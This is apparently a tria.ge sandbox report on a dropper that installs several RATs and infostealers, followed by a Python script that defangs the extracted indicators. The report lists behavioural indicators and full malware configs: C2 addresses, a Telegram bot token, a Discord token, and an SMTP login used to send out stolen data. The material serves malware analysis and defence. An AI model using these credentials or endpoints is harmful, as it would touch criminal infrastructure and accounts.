Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system -
submitted
10/12/2024, 14:56
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document mod.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
ntoskrnl.exe
-
pastebin_url
https://pastebin.com/raw/5FinF5Mf
-
telegram
https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434
Extracted
discordrat
-
discord_token
MTMxNTExMzk1MTQwMjUyNDc5Mg.Gr0nG0.RZobhhDSOoVNDV4G6dfAh3s5Qo1p7HVqUhKZ3o
-
server_id
1313949691574226985
Extracted
rhadamanthys
https://95.214.55.177:1689/e21adcd5478c6d21f12/jf923j9f.kd10d2
Extracted
lumma
https://powerful-avoids.sbs/api
https://motion-treesz.sbs/api
https://disobey-curly.sbs/api
https://leg-sate-boat.sbs/api
https://story-tense-faz.sbs/api
https://blade-govern.sbs/api
https://occupy-blushi.sbs/api
https://frogs-severz.sbs/api
https://appear-guides.cyou/api
Extracted
snakekeylogger
-
Protocol
smtp
-
Host
mail.dap.vn
-
Port
587
-
Username
[email protected]
-
Password
KhAnh110886
-
Email To
[email protected]
Extracted
lumma
https://appear-guides.cyou/api
https://drive-connect.cyou/api
https://covery-mover.biz/api
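The configs above mix several indicator shapes: bare host:port pairs (AsyncRAT/VenomRAT), plain C2 URLs (Lumma, Rhadamanthys), a paste URL and a Telegram bot URL that embeds a live bot token (XWorm), and SMTP exfil settings (Snake Keylogger). The script below, an added example rather than tria.ge output, folds them into one deduplicated, defanged list suitable for sharing: the Telegram token's secret half is masked (the bot id is kept as a pivot), hosts are split out of URLs so they can be blocked separately, and duplicate Lumma entries collapse. The dictionary is copied from the report; the SMTP entry is rewritten as an `smtp://` URL so it goes through the same path, and the SMTP credentials and the Discord token are deliberately left out. Helper and function names are ours.

```python
"""Turn the extracted C2 configs into a deduplicated, defanged indicator
list that is safe to share. Added example; the values are copied from the
report's Malware Config section, the helper names are ours, and the SMTP
credentials and Discord token are deliberately left out."""
import re
from urllib.parse import urlsplit

# Copied from the report. The snakekeylogger SMTP host/port is written as a
# URL here so every entry goes through the same code path.
EXTRACTED = {
    "asyncrat": ["205.209.109.10:4449", "205.209.109.10:7723"],
    "xworm": [
        "https://pastebin.com/raw/5FinF5Mf",
        "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434",
    ],
    "rhadamanthys": ["https://95.214.55.177:1689/e21adcd5478c6d21f12/jf923j9f.kd10d2"],
    "lumma": [
        "https://powerful-avoids.sbs/api",
        "https://appear-guides.cyou/api",
        "https://appear-guides.cyou/api",   # listed twice in the report
        "https://drive-connect.cyou/api",
    ],
    "snakekeylogger": ["smtp://mail.dap.vn:587"],
}

TELEGRAM_TOKEN = re.compile(r"/bot(\d+):[A-Za-z0-9_-]+")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def redact(value):
    """Keep the bot id (still a pivot) but mask the secret half of the token."""
    return TELEGRAM_TOKEN.sub(r"/bot\1:<redacted>", value)


def defang(value):
    """hxxp scheme and [.] in the host part only; paths stay readable."""
    if "://" in value:
        scheme, rest = value.split("://", 1)
        host, slash, tail = rest.partition("/")
        return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + tail
    return value.replace(".", "[.]")


def indicators(extracted):
    """Return sorted unique (family, kind, defanged value) tuples."""
    out = set()
    for family, values in extracted.items():
        for v in values:
            if "://" in v:
                host = urlsplit(v).hostname          # port stripped, path ignored
                out.add((family, "url", defang(redact(v))))
            else:                                    # bare host:port (asyncrat)
                host = v.rsplit(":", 1)[0]
                out.add((family, "socket", defang(v)))
            kind = "ipv4" if IPV4.fullmatch(host) else "domain"
            out.add((family, kind, defang(host)))
    return sorted(out)


if __name__ == "__main__":
    for family, kind, value in indicators(EXTRACTED):
        print(f"{family:15s} {kind:7s} {value}")
```

Run it to get 17 indicators; the Telegram URL comes out as `hxxps://api[.]telegram[.]org/bot6521061783:<redacted>/...`, which is what you want in a ticket or a shared IoC feed, while the unredacted token stays in the original report for whoever needs to report the bot to Telegram.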
Signatures
-
Asyncrat family
-
Detect Xworm Payload 3 IoCs
resource yara_rule
behavioral1/memory/5628-2501-0x0000000001350000-0x000000000136C000-memory.dmp family_xworm
behavioral1/files/0x0005000000019999-2500.dat family_xworm
behavioral1/memory/4128-3998-0x00000000008E0000-0x00000000008FC000-memory.dmp family_xworm
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule
behavioral1/memory/796-3025-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger
-
Snakekeylogger family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target
PID 4320 created 1196 4320 europe123.exe 21
PID 5952 created 1196 5952 Horizon.pif 21
PID 5952 created 1196 5952 Horizon.pif 21
PID 4064 created 420 4064 powershell.EXE 5
-
resource yara_rule
behavioral1/memory/1984-83-0x0000000000FC0000-0x0000000001422000-memory.dmp VenomRAT
behavioral1/memory/1984-84-0x0000000000FC0000-0x0000000001422000-memory.dmp VenomRAT
-
Venomrat family
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzonerat family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule
behavioral1/memory/1984-83-0x0000000000FC0000-0x0000000001422000-memory.dmp family_asyncrat
behavioral1/memory/1984-84-0x0000000000FC0000-0x0000000001422000-memory.dmp family_asyncrat
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ europe123.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ k1de2zkz.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe
-
Command and Scripting Interpreter: PowerShell 9 IoCs
pid Process
4064 powershell.EXE
7160 powershell.exe
3536 powershell.exe
1084 powershell.exe
1800 powershell.exe
3564 powershell.exe
5892 powershell.exe
6872 powershell.exe
3388 powershell.exe
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion europe123.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion k1de2zkz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion k1de2zkz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Lu4421.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Lu4421.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion europe123.exe
-
Drops startup file 6 IoCs
description ioc Process
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs dog.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetup.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetup.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url cmd.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url cmd.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs cat.exe
-
Executes dropped EXE 49 IoCs
pid Process 576 wrofile1.exe 1296 wrofile1.exe 2424 wrofile1.exe 1984 H3tyh96.exe 2876 cat.exe 3896 AutoHotkeyU64.exe 1196 Explorer.EXE 6180 Setup.exe 6472 dog.exe 5628 KrnlSetup.exe 5712 Client-built.exe 6048 Z9Pp9pM.exe 6108 profile1.exe 6160 profile1.exe 6220 profile1.exe 6568 images.exe 6896 images.exe 6920 images.exe 1664 C1J7SVw.exe 6468 7z.exe 2336 7z.exe 2564 7z.exe 6588 7z.exe 5156 7z.exe 5604 7z.exe 6040 7z.exe 5472 7z.exe 6156 in.exe 5100 pSRrNpLv0bS37RA.exe 6624 Loader.exe 4320 europe123.exe 4832 l3bevvn7.exe 5048 pSRrNpLv0bS37RA.exe 5440 k1de2zkz.exe 2648 d8rb24m3.exe 324 Lu4421.exe 2464 lega.exe 3748 lega.exe 1632 g9win6bb.exe 2008 dmn6qzwr.exe 5952 Horizon.pif 2160 kxfh9qhs.exe 472 services.exe 3384 xtoxzfwgupjk.exe 4128 ntoskrnl.exe 4152 Intel_PTT_EK_Recertification.exe 4256 App.exe 5016 App.exe 5548 RegAsm.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine H3tyh96.exe
-
Loads dropped DLL 64 IoCs
pid Process 576 wrofile1.exe 576 wrofile1.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 1196 Explorer.EXE 2944 New Text Document mod.exe 1196 Explorer.EXE 6404 WerFault.exe 6404 WerFault.exe 6404 WerFault.exe 6404 WerFault.exe 2944 New Text Document mod.exe 6404 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 6108 profile1.exe 6108 profile1.exe 6160 profile1.exe 668 cmd.exe 6468 7z.exe 668 cmd.exe 2336 7z.exe 668 cmd.exe 2564 7z.exe 668 cmd.exe 6588 7z.exe 668 cmd.exe 5156 7z.exe 668 cmd.exe 5604 7z.exe 668 cmd.exe 6040 7z.exe 668 cmd.exe 5472 7z.exe 668 cmd.exe 668 cmd.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 4320 europe123.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 2464 lega.exe 5424 cmd.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 472 services.exe 3700 taskeng.exe 3700 taskeng.exe 2944 New Text Document mod.exe 4256 App.exe 5016 App.exe 5952 Horizon.pif 5548 RegAsm.exe -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" profile1.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntoskrnl = "C:\\ProgramData\\ntoskrnl.exe" KrnlSetup.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k1de2zkz.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA europe123.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow ioc
70 raw.githubusercontent.com
71 raw.githubusercontent.com
72 raw.githubusercontent.com
69 raw.githubusercontent.com
73 raw.githubusercontent.com
86 raw.githubusercontent.com
30 pastebin.com
31 pastebin.com
32 raw.githubusercontent.com
33 raw.githubusercontent.com
68 raw.githubusercontent.com
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
24 ip-api.com
61 checkip.dyndns.org
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2804 powercfg.exe 2248 powercfg.exe 5088 powercfg.exe 5036 powercfg.exe 2312 powercfg.exe 1768 powercfg.exe 1412 powercfg.exe 3856 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe xtoxzfwgupjk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe l3bevvn7.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4976 tasklist.exe 5168 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1984 H3tyh96.exe 4320 europe123.exe 5440 k1de2zkz.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target
PID 576 set thread context of 1296 576 wrofile1.exe 32
PID 576 set thread context of 2424 576 wrofile1.exe 33
PID 6108 set thread context of 6160 6108 profile1.exe 47
PID 6108 set thread context of 6220 6108 profile1.exe 48
PID 6568 set thread context of 6896 6568 images.exe 50
PID 6568 set thread context of 6920 6568 images.exe 51
PID 2464 set thread context of 3748 2464 lega.exe 98
PID 5100 set thread context of 796 5100 pSRrNpLv0bS37RA.exe 105
PID 5048 set thread context of 6108 5048 pSRrNpLv0bS37RA.exe 129
PID 4832 set thread context of 3832 4832 l3bevvn7.exe 140
PID 3384 set thread context of 2504 3384 xtoxzfwgupjk.exe 161
PID 3384 set thread context of 5964 3384 xtoxzfwgupjk.exe 164
PID 3384 set thread context of 5376 3384 xtoxzfwgupjk.exe 168
PID 4152 set thread context of 4700 4152 Intel_PTT_EK_Recertification.exe 176
PID 4064 set thread context of 5912 4064 powershell.EXE 182
-
resource yara_rule
behavioral1/memory/668-2688-0x000000013F0A0000-0x000000013F530000-memory.dmp upx
behavioral1/memory/6156-2693-0x000000013F0A0000-0x000000013F530000-memory.dmp upx
behavioral1/memory/6156-2690-0x000000013F0A0000-0x000000013F530000-memory.dmp upx
behavioral1/memory/4152-4000-0x000000013FBB0000-0x0000000140040000-memory.dmp upx
behavioral1/memory/4152-4089-0x000000013FBB0000-0x0000000140040000-memory.dmp upx
-
Drops file in Windows directory 5 IoCs
description ioc Process
File opened for modification C:\Windows\MiddleOrganize g9win6bb.exe
File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
File opened for modification C:\Windows\EmotionalCnet g9win6bb.exe
File opened for modification C:\Windows\NigerMauritius g9win6bb.exe
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 3644 sc.exe 3548 sc.exe 2736 sc.exe 2984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target
5960 6472 WerFault.exe 40
-
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wrofile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dmn6qzwr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kxfh9qhs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pSRrNpLv0bS37RA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k1de2zkz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d8rb24m3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pSRrNpLv0bS37RA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dialer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lega.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lega.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Horizon.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C1J7SVw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language europe123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g9win6bb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2476 powershell.exe 4288 PING.EXE 4904 powershell.exe 5612 PING.EXE -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f03ff1e3134bdb01 powershell.exe
-
Modifies system certificate store 10 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 lega.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data omitted) lega.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 H3tyh96.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data omitted) H3tyh96.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 H3tyh96.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data omitted) H3tyh96.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 New Text Document mod.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (blob data omitted) New Text Document mod.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data omitted) H3tyh96.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data omitted) H3tyh96.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4288 PING.EXE 5612 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3540 schtasks.exe 6324 schtasks.exe 7064 schtasks.exe 4068 schtasks.exe 4252 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1984 H3tyh96.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 2876 cat.exe 2876 cat.exe 6472 dog.exe 6472 dog.exe 1984 H3tyh96.exe 7160 powershell.exe 1984 H3tyh96.exe 3536 powershell.exe 1084 powershell.exe 1800 powershell.exe 2476 powershell.exe 1984 H3tyh96.exe 6624 Loader.exe 6624 Loader.exe 2080 dialer.exe 2080 dialer.exe 2080 dialer.exe 2080 dialer.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 1984 H3tyh96.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 4320 europe123.exe 5440 k1de2zkz.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 5100 pSRrNpLv0bS37RA.exe 5100 pSRrNpLv0bS37RA.exe 3564 powershell.exe 796 vbc.exe 4832 l3bevvn7.exe 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif 1984 H3tyh96.exe 6872 powershell.exe 6108 vbc.exe 2160 kxfh9qhs.exe 2160 kxfh9qhs.exe 1984 H3tyh96.exe 1984 H3tyh96.exe 5892 powershell.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe 4832 l3bevvn7.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2944 New Text Document mod.exe Token: SeDebugPrivilege 576 wrofile1.exe Token: SeDebugPrivilege 1984 H3tyh96.exe Token: SeDebugPrivilege 2876 cat.exe Token: SeDebugPrivilege 2876 cat.exe Token: SeDebugPrivilege 6472 dog.exe Token: SeDebugPrivilege 5628 KrnlSetup.exe Token: SeDebugPrivilege 6472 dog.exe Token: SeDebugPrivilege 6108 profile1.exe Token: SeDebugPrivilege 6568 images.exe Token: SeDebugPrivilege 7160 powershell.exe Token: SeRestorePrivilege 6468 7z.exe Token: 35 6468 7z.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeSecurityPrivilege 6468 7z.exe Token: SeRestorePrivilege 2336 7z.exe Token: 35 2336 7z.exe Token: SeSecurityPrivilege 2336 7z.exe Token: SeSecurityPrivilege 2336 7z.exe Token: SeRestorePrivilege 2564 7z.exe Token: 35 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeRestorePrivilege 6588 7z.exe Token: 35 6588 7z.exe Token: SeSecurityPrivilege 6588 7z.exe Token: SeSecurityPrivilege 6588 7z.exe Token: SeRestorePrivilege 5156 7z.exe Token: 35 5156 7z.exe Token: SeSecurityPrivilege 5156 7z.exe Token: SeSecurityPrivilege 5156 7z.exe Token: SeRestorePrivilege 5604 7z.exe Token: 35 5604 7z.exe Token: SeSecurityPrivilege 5604 7z.exe Token: SeSecurityPrivilege 5604 7z.exe Token: SeRestorePrivilege 6040 7z.exe Token: 35 6040 7z.exe Token: SeSecurityPrivilege 6040 7z.exe Token: SeSecurityPrivilege 6040 7z.exe Token: SeRestorePrivilege 5472 7z.exe Token: 35 5472 7z.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeSecurityPrivilege 5472 7z.exe Token: SeSecurityPrivilege 5472 7z.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 5100 pSRrNpLv0bS37RA.exe Token: SeDebugPrivilege 324 Lu4421.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 796 vbc.exe Token: SeDebugPrivilege 4976 tasklist.exe Token: SeDebugPrivilege 5168 
tasklist.exe Token: SeDebugPrivilege 6872 powershell.exe Token: SeDebugPrivilege 6108 vbc.exe Token: SeDebugPrivilege 5892 powershell.exe Token: SeDebugPrivilege 4832 l3bevvn7.exe Token: SeShutdownPrivilege 2804 powercfg.exe Token: SeShutdownPrivilege 2248 powercfg.exe Token: SeShutdownPrivilege 3856 powercfg.exe Token: SeShutdownPrivilege 1412 powercfg.exe Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 3384 xtoxzfwgupjk.exe Token: SeShutdownPrivilege 1768 powercfg.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5952 Horizon.pif 5952 Horizon.pif 5952 Horizon.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1984 H3tyh96.exe -
Suspicious use of WriteProcessMemory 64 IoCs
